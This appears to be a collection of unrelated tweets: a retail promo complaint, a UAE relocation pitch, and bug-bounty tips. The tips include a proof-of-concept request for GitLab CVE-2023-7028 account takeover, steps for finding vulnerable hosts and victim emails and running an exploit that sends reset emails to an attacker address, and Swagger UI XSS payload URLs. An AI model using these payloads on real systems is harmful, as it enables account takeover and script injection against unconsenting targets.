@myfitness_IN Your payday sale promotion is misleading. The website advertise up to 20% + 5% off a free protein bar on orders ₹599 & above. However, using the payday promo disqualifies us from the protein bar offer, which isn't mentioned clearly. Please clarify
#MisleadingOffer
If you’re frustrated of Taxes and Nirmala Tai, move to the UAE!
- 3 hrs from Delhi
- Better pay & living
- Mostly Indians + some foreigners for aesthetics
- No income tax
- Easy visa process
- Safe for everyone
Just updated!!!
I've scanned over 175k public GitHub repos and around 35 million files to create a bunch of useful web app fuzzing lists.
https://t.co/rRIICraIT1
#infosec#bugbountytips#cybersecurity
Bug Bounty Tips: Finding additional targets connected to your widescope target.
Have you exhausted your options for discovering associated assets through CIDR, Reverse WHOIS, Favicon Hash, DNS Records, Acquisitions, etc.?
Here's another method to identify additional assets related to a target site: explore tag history. This site reveals all associated assets based on the usage of the same tag.
Here's how to access this valuable data:
1️⃣ You must login to https://t.co/xil5tQQ3O4
2️⃣ Visit https://t.co/tGh1n2lJjM
You'll find a list of assets associated with your target domain. Use this information to further verify, investigate, and hunt for potential findings on additional targets.
#BugBounty #HackerOne #BugCrowd #BugBountyTips #SecurityTips 🐛🔍🛡️
Bug hunters: Looking for high quality, technical content?
Here's a huge list of infosec content creators!
There's so much info including:
🪪 Name
🧑🎨 Content type
🌎 Country
🗓️ Schedule
🔗 Social links
🕕 Timezone
Make sure to bookmark this 🔗 https://t.co/9ebrDgcct9
🔍GitLab CVE-2023-7028 - Uncover account takeover potential with a simple password reset method.
Known POC:
user[email][][email protected]&user[email][][email protected]
Identifying vulnerable targets:
1️⃣ Utilize the nuclei template at https://t.co/9gC1rBxVnB to spot exposed Gitlab Instances.
2️⃣ Hunt for potentially valid victim org emails through various sources. An effortless choice is https://t.co/s29tuRAYzQ.
3️⃣ Install and execute the Python script found at https://t.co/P55jST9rET on these hosts. If the target is vulnerable you'll likely receive an email on your attacker-controlled server.
Usage: https://t.co/iDz14sk5pF [-u URL] -v victim@example[.]com -a attacker@wearehackerone[.]com
#BugBountyTips #HackerOne #BugCrowd #Security #InfoSec #SecurityTips
If you finds any Swagger ui endpoint try following payloads for xss+html injection.
/index.html?configUrl=https://t.co/BCj67bsP36
/index.html?configUrl=https://t.co/ZNdLs70Fa4
/index.html?config=https://t.co/bUa05PuwQf
/index.html?configUrl=https://t.co/hJKPHCQ4ze